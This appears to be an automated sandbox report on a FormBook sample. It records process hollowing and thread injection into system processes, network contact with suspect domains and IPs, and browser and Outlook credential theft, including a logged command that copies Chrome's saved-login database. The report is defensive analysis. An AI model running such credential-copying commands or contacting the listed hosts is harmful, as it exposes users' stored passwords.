          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF626 mov eax, dword ptr fs:[00000030h]1_2_036AF626
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E6620 mov eax, dword ptr fs:[00000030h]1_2_036E6620
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03785636 mov eax, dword ptr fs:[00000030h]1_2_03785636
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E8620 mov eax, dword ptr fs:[00000030h]1_2_036E8620
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C260B mov eax, dword ptr fs:[00000030h]1_2_036C260B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C260B mov eax, dword ptr fs:[00000030h]1_2_036C260B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C260B mov eax, dword ptr fs:[00000030h]1_2_036C260B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C260B mov eax, dword ptr fs:[00000030h]1_2_036C260B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C260B mov eax, dword ptr fs:[00000030h]1_2_036C260B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C260B mov eax, dword ptr fs:[00000030h]1_2_036C260B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C260B mov eax, dword ptr fs:[00000030h]1_2_036C260B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E1607 mov eax, dword ptr fs:[00000030h]1_2_036E1607
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EF603 mov eax, dword ptr fs:[00000030h]1_2_036EF603
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2619 mov eax, dword ptr fs:[00000030h]1_2_036F2619
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E609 mov eax, dword ptr fs:[00000030h]1_2_0372E609
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B3616 mov eax, dword ptr fs:[00000030h]1_2_036B3616
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B3616 mov eax, dword ptr fs:[00000030h]1_2_036B3616
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E6F2 mov eax, dword ptr fs:[00000030h]1_2_0372E6F2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E6F2 mov eax, dword ptr fs:[00000030h]1_2_0372E6F2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E6F2 mov eax, dword ptr fs:[00000030h]1_2_0372E6F2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E6F2 mov eax, dword ptr fs:[00000030h]1_2_0372E6F2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037306F1 mov eax, dword ptr fs:[00000030h]1_2_037306F1
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037306F1 mov eax, dword ptr fs:[00000030h]1_2_037306F1
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376D6F0 mov eax, dword ptr fs:[00000030h]1_2_0376D6F0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DD6E0 mov eax, dword ptr fs:[00000030h]1_2_036DD6E0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DD6E0 mov eax, dword ptr fs:[00000030h]1_2_036DD6E0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037436EE mov eax, dword ptr fs:[00000030h]1_2_037436EE
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037436EE mov eax, dword ptr fs:[00000030h]1_2_037436EE
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037436EE mov eax, dword ptr fs:[00000030h]1_2_037436EE
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037436EE mov eax, dword ptr fs:[00000030h]1_2_037436EE
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037436EE mov eax, dword ptr fs:[00000030h]1_2_037436EE
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037436EE mov eax, dword ptr fs:[00000030h]1_2_037436EE
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E16CF mov eax, dword ptr fs:[00000030h]1_2_036E16CF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EA6C7 mov ebx, dword ptr fs:[00000030h]1_2_036EA6C7
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EA6C7 mov eax, dword ptr fs:[00000030h]1_2_036EA6C7
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BB6C0 mov eax, dword ptr fs:[00000030h]1_2_036BB6C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BB6C0 mov eax, dword ptr fs:[00000030h]1_2_036BB6C0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00390B1F GetLastError,SetLastError,GetProcessHeap,HeapFree,6_2_00390B1F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00418847 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00418847
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 66.29.149.193 80Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Internet Explorer\iexplore.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files\Internet Explorer\iexplore.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: execute and read and writeJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3916Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000Jump to behavior
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 300000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2EA7008Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000Jump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: explorer.exe, 00000005.00000002.4158354686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1759741913.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1766227290.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000002.4158354686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1757982641.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4161000809.000001BA5AC90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.1757634242.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4157091607.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000005.00000002.4158354686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1757982641.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4161000809.000001BA5AC90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000002.4158354686.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1757982641.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4161000809.000001BA5AC90000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: GetLocaleInfoW,wcsncmp,6_2_004165E0
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeQueries volume information: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00417751 GetSystemTime,SystemTimeToFileTime,GetLastError,6_2_00417751
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003A2831 GetUserNameExW,GetLastError,GetLastError,GetUserNameExW,GetLastError,SetLastError,LoadLibraryExW,GetLastError,GetProcAddress,GetLastError,NetApiBufferFree,FreeLibrary,6_2_003A2831
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003992B6 memset,GetVersionExW,GetLastError,GetLastError,6_2_003992B6
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003A44EC LocalAlloc,CreateWellKnownSid,GetLastError,RpcBindingSetAuthInfoExW,LocalFree,RpcBindingFree,6_2_003A44EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003A85B1 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,6_2_003A85B1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003A873B RpcBindingSetAuthInfoExW,LocalFree,RpcBindingSetAuthInfoExW,RpcBindingFree,6_2_003A873B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00378C82 socket,setsockopt,bind,setsockopt,setsockopt,setsockopt,listen,WSAEventSelect,WSAEventSelect,6_2_00378C82
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_003A3E64 memset,GetCurrentProcessId,ProcessIdToSessionId,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,RpcBindingFree,6_2_003A3E64

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		5
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Shared Modules          		11
          Registry Run Keys / Startup Folder          		712
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Exploitation for Client Execution          		Logon Script (Windows)11
          Registry Run Keys / Startup Folder          		3
          Obfuscated Files or Information          		Security Account Manager3
          File and Directory Discovery          		SMB/Windows Admin Shares1
          Screen Capture          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          Command and Scripting Interpreter          		Login HookLogin Hook1
          Timestomp          		NTDS126
          System Information Discovery          		Distributed Component Object Model1
          Email Collection          		15
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets1
          Query Registry          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading          		Cached Domain Credentials251
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
          Virtualization/Sandbox Evasion          		DCSync3
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job712
          Process Injection          		Proc Filesystem2
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow11
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1447829 Sample: #U0426#U0438#U0442#U0430#U0... Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 83 www.qieqyt.xyz 2->83 85 www.mtdiyx.xyz 2->85 87 22 other IPs or domains 2->87 117 Snort IDS alert for network traffic 2->117 119 Multi AV Scanner detection for domain / URL 2->119 121 Found malware configuration 2->121 125 10 other signatures 2->125 13 #U0426#U0438#U0442#U0430#U0442#U0430.exe 2 2->13         started        signatures3 123 Performs DNS queries to domains with low reputation 85->123 process4 signatures5 139 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->139 141 Writes to foreign memory regions 13->141 143 Sample uses process hollowing technique 13->143 145 Injects a PE file into a foreign processes 13->145 16 iexplore.exe 13->16         started        19 WerFault.exe 19 16 13->19         started        process6 signatures7 109 Modifies the context of a thread in another process (thread injection) 16->109 111 Maps a DLL or memory area into another process 16->111 113 Sample uses process hollowing technique 16->113 115 Queues an APC in another process (thread injection) 16->115 21 explorer.exe 21 5 16->21 injected process8 dnsIp9 95 www.aicashu.com 38.174.75.236, 49851, 49852, 80 COGENT-174US United States 21->95 97 venitro.com 3.33.130.190, 49849, 49850, 80 AMAZONEXPANSIONGB United States 21->97 99 2 other IPs or domains 21->99 129 System process connects to network (likely due to code injection or exploit) 21->129 25 mstsc.exe 1 18 21->25         started        29 iexplore.exe 21->29         started        31 iexplore.exe 21->31         started        33 2 other processes 21->33 signatures10 process11 file12 79 C:\Users\user\AppData\...\260logrv.ini, data 25->79 dropped 81 C:\Users\user\AppData\...\260logri.ini, data 25->81 dropped 131 Detected FormBook malware 25->131 133 Tries to steal Mail credentials (via file / registry access) 25->133 135 Creates multiple autostart registry keys 25->135 137 6 other signatures 25->137 35 cmd.exe 2 25->35         started        39 firefox.exe 25->39         started        41 iexplore.exe 73 111 29->41         started        43 iexplore.exe 31->43         started        45 msedge.exe 33->45         started        47 msedge.exe 33->47         started        signatures13 process14 file15 77 C:\Users\user\AppData\Local\Temp\DB1, SQLite 35->77 dropped 127 Tries to harvest and steal browser information (history, passwords, etc) 35->127 49 conhost.exe 35->49         started        51 ie_to_edge_stub.exe 41->51         started        53 iexplore.exe 41->53         started        56 iexplore.exe 41->56         started        58 2 other processes 41->58 signatures16 process17 dnsIp18 60 msedge.exe 51->60         started        101 code.jquery.com 151.101.130.137, 443, 49788, 49789 FASTLYUS United States 53->101 103 sb.scorecardresearch.com 18.244.18.38, 443, 49782, 49783 AMAZON-02US United States 53->103 64 ie_to_edge_stub.exe 53->64         started        66 ssvagent.exe 53->66         started        105 prod.appnexus.map.fastly.net 151.101.1.108, 443, 49815, 49816 FASTLYUS United States 56->105 process19 dnsIp20 107 239.255.255.250 unknown Reserved 60->107 147 Creates multiple autostart registry keys 60->147 149 Maps a DLL or memory area into another process 60->149 68 msedge.exe 60->68         started        71 msedge.exe 60->71         started        73 identity_helper.exe 60->73         started        75 identity_helper.exe 60->75         started        signatures21 process22 dnsIp23 89 clients2.googleusercontent.com 68->89 91 13.107.246.40, 443, 49806 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 68->91 93 5 other IPs or domains 68->93

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          #U0426#U0438#U0442#U0430#U0442#U0430.exe55%ReversingLabsByteCode-MSIL.Trojan.Leonem
          #U0426#U0438#U0442#U0430#U0442#U0430.exe59%VirustotalBrowse
          #U0426#U0438#U0442#U0430#U0442#U0430.exe100%AviraTR/AD.Swotter.yqbdl

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.aicashu.com6%VirustotalBrowse
          chrome.cloudflare-dns.com0%VirustotalBrowse
          www.qieqyt.xyz0%VirustotalBrowse
          code.jquery.com1%VirustotalBrowse
          sb.scorecardresearch.com0%VirustotalBrowse
          parkingpage.namecheap.com0%VirustotalBrowse
          prod.appnexus.map.fastly.net0%VirustotalBrowse
          tryscriptify.com9%VirustotalBrowse
          googlehosted.l.googleusercontent.com0%VirustotalBrowse
          www.mtdiyx.xyz0%VirustotalBrowse
          www.tryscriptify.com0%VirustotalBrowse
          assets.msn.com0%VirustotalBrowse
          venitro.com9%VirustotalBrowse
          www.camelpmkrf.com9%VirustotalBrowse
          www.msn.com1%VirustotalBrowse
          www.techn9nehollywoodundead.com0%VirustotalBrowse
          acdn.adnxs.com0%VirustotalBrowse
          c.msn.com0%VirustotalBrowse
          www.6733633.com8%VirustotalBrowse
          www.mosaica.online9%VirustotalBrowse
          www.169cc.xyz8%VirustotalBrowse
          clients2.googleusercontent.com0%VirustotalBrowse
          www.naples.beauty1%VirustotalBrowse
          www.venitro.com1%VirustotalBrowse
          api.msn.com0%VirustotalBrowse
          browser.events.data.msn.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://aka.ms/odirmr0%URL Reputationsafe
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
          http://www.twitter.com/0%URL Reputationsafe
